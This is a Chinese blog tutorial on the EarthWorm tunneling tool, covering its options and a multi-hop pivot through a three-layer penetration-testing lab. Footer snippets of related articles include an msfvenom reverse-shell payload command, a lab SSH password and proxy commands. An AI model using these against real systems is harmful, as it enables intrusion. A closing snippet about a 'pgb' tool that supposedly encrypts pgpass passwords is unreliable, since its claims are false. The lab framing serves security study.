EW代理工具的使用说明

最新推荐文章于 2024-01-14 14:37:17 发布
最新推荐文章于 2024-01-14 14:37:17 发布
阅读量1.5k 收藏
点赞数 2
分类专栏: 网络安全工具 渗透项目 文章标签: 网络安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43938645/article/details/130603723
版权

一、EW介绍

Earthworm(EW) 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。

该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。

工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS

二、使用说明

参数说明

-l listenport  open a port for the service startup.      // 为服务启动打开一个端口。
-d refhost set the reflection host address.                // 设置反连主机地址。
-e refport set the reflection port.                              // 设置反连端口。
-f connhost set the connect host address .               // 设置连接主机地址。
-g connport set the connect port.                             // 设置连接端口。

-t usectime set the milliseconds for timeout. The default value is 1000
// 设置超时的毫秒数。默认值值为1000

-s state setup the function.                                       // 状态设置功能。

六种链路状态,通过 -s 参数选定,分别为:

ssocksd rcsocks rssocks

lcx_slave lcx_tran lcx_listen

其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理。

lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。

lcx_slave 控制管道:一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机。

lcx_tran 转发管道:通过监听本地端口接收代理请求,并转交给代理提供主机。

lcx_listen 监听管道:通过监听本地端口接收数据,并将其转交给目标网络回连的代理提供主机。

通过组合lcx类别管道的特性,可以实现多层内网环境下的渗透测试。

参考链接:EarthWorm

三、实战(CFS)

接CFS三层内网靶机渗透,之前所用均是kali自带的代理工具,且异常不稳定!在渗透第二个目标是,用个sqlmap就挂了!这边用ew进行实战,发现还是相当稳定的!

包括端口探测都没问题!

这边是已经得到shell的两台靶机一个是75网段,一个22网段,还有一个是33网段,33网段只有22网段的那台靶机可以去访问,现在就是利用ew进行三级跳转,可以使得攻击机kali能够以第二台靶机身份进行内网访问。

这边通过蚁剑上传ew

 

 首先,先和第一个靶机建立连接,开启反向代理,让kali能够以第一台靶机的身份去访问第二台。

这边就省略了一下操作,是通过proxychains4 探测22网段的靶机,也就是第二台,利用代理使用sqlmap爆破数据库,使用浏览器代理,访问22网段靶机的web服务等

在kali本机上使用如下命令,将1097端口映射到8888端口,用来监听

在第二台靶机上开启正向代理,指定端口9999

 

 这里有个坑,就是第二台靶机,需要安装环境,才能使用ew,否则上传上去无法执行

在第一台靶机上输入下面的端口进行kali和第二台靶机的连接,将流量引到相应的端口

随后就可以在kali上使用代理进行对内网靶机的端口探测了,这边看到开放了139和445,永恒之蓝打一波!

 这边虽然获得了meterpreter,但是在shell的时候出现了问题,可能是我太菜了,在建立shell的时候,会和127.0.0.1建立,然后就停止了,如果有大佬,可以给小弟指导一二,万分感谢!

Ays.Ie
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
使用EW作Socks5代理进行内网渗透1
08-03
1. 如何使用EW做反向Socks5代理 2. 浏览器如何设置Socks5代理访问目标内网Web服务 3. 利用proxychains给终端设置Socks5代理
内网转发工具EW使用
Bird&Bird
12-22 3437
目录EW(EarthWorm)结合proxychains代理EW正向代理EW反向代理 EW 是一套便携式的网络穿透工具,具有 SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用,跨平台,任何平台都可以轻松使用EW(
【渗透测试】ew代理三层靶机穿透+proxifier配置规则
serendipity1130的博客
09-02 2609
1.远程连接: ssh [email protected] W6WEwrqD 2.msf生成木马: cd /usr/share/metasploit-framework ./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.177.228.128 LPORT=1234 -f elf > /home/load.elf 3.上传木马payload.elf文件到一层靶机: scp -p load.elf yansiyu@
IAR EW430开发工具使用指南
04-23
IAR EW430开发工具使用指南:瑞典IAR System公司推出的IAR EW软件是一种非常有效的嵌入式系统开发工具,它使用户能够充分有效地开发并管理嵌入式应用项目,其界面类似于MS Visual C++,可以在Windows平台上运行,功能十分完善。包含有源程序文件编辑器,项目管理器,源程序调试器等,并且为C/C++编译器,汇编器,连接定位器等提供了单一而灵活的开发环境。源级浏览器功能可以快速浏览源文件;还提供了对第三方工具软件的接口,允许启动用户指定的应用程序。 IAR EW适用于开发基于8位,16位以及32位的处理器的嵌入式系统,其具有同一界面,用户可以针对多种不同的目标处理器,在相同的集成开发环境中进行基于不同CPU嵌入式系统应用程序的开发。另外IAR的链接定位器(XLINK)可以输出多种格式的目标文件,使用户可以采用第三方软件进行仿真调试。
EW-988D使用说明
09-17
EW-988D 使用说明书》 1、工作电压:AC220V ±10% 50HZ/60HZ 2、输出负载:制冷继电器、加热继电器各10A/220V/AC 3、功 耗:≤3W 4、工作环境:-10℃~50℃ RH ≤90% 5、输出控制:一路加热、一路降温 6、控制范围:-19.9℃~99.9℃ 1、工作电压:AC220V ±10% 50HZ/60HZ 2、输出负载:制冷继电器、加热继电器各10A/220V/AC 3、功 耗:≤3W 4、工作环境:-10℃~50℃ RH ≤90% 5、输出控制:一路加热、一路降温 6、控制范围:-19.9℃~99.9℃ 7、分辨率: 0.1℃ 精度:±0.5℃ 8、输入信号:一路测温传感器, 7、分辨率: 0.1℃ 精度:±0.5℃ 8、输入信号:一路测温传感器, 20 Kx1. .5 5米 9、整机尺寸:76(宽)×35(高)×76(深)mm 10、开孔尺寸:71(宽)×29(高)mm
【内网—内网转发】——代理转发_ew(Earthworm)代理转发
weixin_45588247的博客
09-11 4582
文章目录一、实验环境:二、工具:三、概念:四、学习目的:五、ew(Earthworm)介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):1. 场景:2. 网络拓扑图:3. 说明:4. 实验过程:八、ew(Earthworm)反向代理:1. 一级代理:1.1 场景:1.2 网络拓扑图:1.3 说明:1.4 实验过程:2. 二级代理(一):2.1 场景:2.2 网络拓扑图:2.3 说明:2.4 实验过程: 一、实验环境: 角色 系统
ew代理三层靶机实验穿透
m0_58595840的博客
01-11 1122
EW工具实现三层内网穿透
EarthWorm(ew):复杂网络环境下端口转发及SOCKS5代理工具
ZL_1618的博客
08-14 1261
本文是在学习了下面参考文章的基础上,基于自己的理解和心得补充了数据流量拓扑图,这样更好理解工具使用场景和记住命令;本文仅作为技术交流。1.耐下心来刚开始看到这个工具本想一看而过,后来耐心的学习一下,打开了新世界。2.动手实践看了很多文章也包括官方的文档;发现对小白来说想了解工具功能和不同场景,单看文字不直观,没有网络拓扑很难理解。所以本着自己边学习边记录边分享的精神,整理了这篇文章。3.横向比较3.1还发现了这个作者的另一个好用的工具Termite;目前EW和Termite作者已经不维护了;
隧道应用4-内网穿透EW的简单使用
最新发布
Welcome To Myon'Blog !
01-14 645
使用另一台主机访问该主机的 8888 端口,该主机 IP 为192.168.249.1。lcx_slave/lcx_listen/lcx_tran + 端口转发参数。则会直接跳转到 192.168.249.129 的dvwa靶场服务。通过跳板机配置的端口转发进而访问到内网其他主机的服务。与netsh端口映射内网类似,也是通过跳板机实现。装好工具EW,这里以Windows版本做演示。停掉 ew ,再次访问,则无法加载页面。以上就是关于 ew 的一个简单用法。在 cmd 里面执行如下命令。
ew使用
xxx9686的博客
09-15 630
实战中的多样化场景可能更加复杂也可能比较简单,无法一一阐述,篇章尽量覆盖常见类型场景,描述了4种场景下ew的基本使用。内容都是基础,工具使用上也无太多难处,关键在于弄清楚实战中目标内网数据流向,把复杂的大场景拆分成若干个小场景,使问题变得简单。纸上得来终觉浅,绝知此事要躬行,多实操多思考,方能不断进步。
使用Earthworm (EW) 做Socks5代理
01-09
正向代理 1.选择合适的ew文件(将文件ew_…改为ew.exe,为了在命令行少敲几个字母),上传到边缘服务器 2.边缘服务器输入 ew.exe -s ssocksd -l 8000 3.可借助proxifier工具配置攻击机整台机器的代理(proxifier添加代理服务器,ip为边缘服务器ip,8000端口) 4.之后直接访问目标服务器任意端口即可 攻击机为Linux 1.选择合适的ew文件,上传到边缘服务器 2.边缘服务器输入 ew.exe -s ssocksd -l 8000 3此时攻击机3389仍然不能访问,可借助proxychains(kali自带)配置攻击机整台机器的代理
IAR_EW430开发工具使用指南
10-22
IAR_EW430 开发工具 使用指南 帮助使用IAR_EW430开发工具
内网穿透大杀器--EarthWorm
热门推荐
大方子
08-24 2万+
0x00 前言如果感觉本文对你有帮助,请在文章末尾点个赞,谢谢表哥们支持! 当你在内网渗透,并且拿下一台机器的权限时,你是不是觉得已经算是一次完整的渗透了? 不来一次内网漫游,渗透是不完整的,哈哈。 本文给大家推荐一款内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。 它强在哪些方面呢? 1.可穿...
内网穿透-EW贯穿内网
MachineGunJoe666
05-30 1047
EW 官网介绍啊:EW 是一套便携式的网络穿透工具,集socks代理和端口转发与一身,支持正向、反向、多级级联方式为我们打通隧道。而且支持多系统,可在复杂网络环境(win,linux,mac之间)完成网络穿透。 官网:http://rootkiter.com/EarthWorm/ 这工具代理借鉴了ssocks,端口转发是借鉴了Lcx工具使用方法,今就详细研究研究一下这个工具 工具使用 这里提一嘴啊,代理和端口转发不太一样 代理是我们可以使用它ip进行网络访问 端口转发是一...
基于EarthWorm的正反向socks5代理
yy
02-08 4071
EarthWorm是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处
ew三层代理使用方法
m0_50818626的博客
09-20 248
/ 在 2.2.2.2 上,通过工具的 lcx_slave 方式,打通1.1.1.1:8888 和 2.2.2.3:9999 之间的通讯隧道。注意这里需要修改IP,1.1.1.1为kali的IP,2.2.2.3为windows server 2016的IP。A 主机: 目标网络的边界主机,无公网 IP,无法访问特定资源。B 主机: 目标网络内部主机,可访问特定资源,却无法回连公网。// 在 1.1.1.1 公网主机添加转接隧道,将 1080 收到的代理请求。// 转交给反连 8888 端口的主机。
EW简单设置代理web服务器
The current road is different, love needs to distinguish between right and wrong
01-21 2544
正向代理 服务端我这里是在linux系统上进行监听的,使用的是阿里云的服务器。 ./ew_for_linux64 -s ssocksd -l 2222 #监听本地的2222端口 然后设置客户端,windows系统的话直接配置浏览器的代理或是使用类似proxifier的代理软件设置全局代理即可。 linux系统的话配置proxychains代理链的配置文件,设置成监听的ip和端口 vi /etc/proxychains4.conf 然后命令前面加上 proxy.
ew和frp多层代理方法
qq_50854662的博客
09-11 254
多层代理
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8223
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
pgb加密工具如何使用
06-08
`pgb` 是一种加密工具,可以用来生成 `pgpass` 文件中的加密密码。使用 `pgb` 进行加密的步骤如下: 1. 安装 `pgb` 工具。可以通过以下命令在 Linux 或 macOS 中安装: ``` curl -L https://github.com/lfittl/pgb/raw/master/pgb > /usr/local/bin/pgb chmod +x /usr/local/bin/pgb ``` 在 Windows 中可以在 [pgb 的 GitHub 页面](https://github.com/lfittl/pgb) 下载可执行文件,并将其添加到系统 PATH。 2. 生成加密密码。使用以下命令生成加密密码: ``` echo "mysecretpassword" | pgb ``` 这将输出一个加密后的密码,类似于: ``` U2FsdGVkX19FYn4LjwAAAABnZqj8eW2P5a5YhK3t8B0= ``` 3. 将加密密码添加到 `pgpass` 文件中。在 `pgpass` 文件中,将密码字段替换为步骤 2 中生成的加密密码。例如: ``` localhost:5432:mydb:myuser:U2FsdGVkX19FYn4LjwAAAABnZqj8eW2P5a5YhK3t8B0= ``` 注意,为了保证安全,不要将 `pgb` 生成的密文和明文密码同时存储在同一文件中。 在连接数据库时,`psql` 会自动解密 `pgpass` 文件中的密码,并使用该密码进行连接。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值